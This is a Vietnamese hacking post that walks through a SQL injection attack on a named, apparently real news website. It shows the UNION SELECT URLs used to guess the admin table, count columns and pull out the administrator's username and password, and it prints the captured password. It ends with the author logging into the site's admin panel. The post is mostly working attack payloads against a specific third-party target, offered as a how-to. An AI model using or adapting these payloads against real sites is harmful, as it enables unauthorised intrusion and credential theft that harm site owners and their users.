Advanced - Jet SQL

a thử test lỗi nhá http://www.mtdplaza.com/tintuc.asp?tin_ID=147 thêm dấu ‘ vào đằng sau chắc cái này ai cũng biết sau khi thêm song nó ra như thế này Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′ [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘tin_ID=147”. /admin/admin_newsdetail.asp, line 12 ok chúng ta bắt đầu khai thác nhá đầu tiên dùng câu lệnh union select 0,1 from tb_mane tb_manecái này là bạn phải đoán mò thui thường nó là tb_admin tbl_admin tbl_user v…….. Trong trường hợp này mình đoán la tb_admin và đường link sẽ là http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1 from tb_admin he he Đúng luôn Microsoft OLE DB Provider for ODBC Drivers error ’80004005′ [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /tintuc.asp, line 20 bây giờ tiếp ta khai thác columns các bạn thêm http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1,2,3,4,5,6,7,8,9,10 from tb_admin má đến 10 rồi mà vẫn chưa ra thế là thế nào vẫn không nản http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tb_admin oa oa đến 17 rồi mà vẫn chưa ra thế là sao nhỉ Cố nữa xem nào chẳng nghẽ đến đây rồi thôi sao phù hô hô thế là ra rồi mẹ đến 18 http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from tb_admin he he thế song rồi nó ra cái số 1 và 2 ta thay số 1 = username he he nó ra admin thế là ta đc user rồi Thay típ số 2 là : passrowd trông mà vui thía : pas của nó là : dungtrang bây giờ ta login xem http://www.mtdplaza.com/login << Chà Hok đc thử cái khác http://www.mtdplaza.com/admin/ a a a đc rồi

Related Post: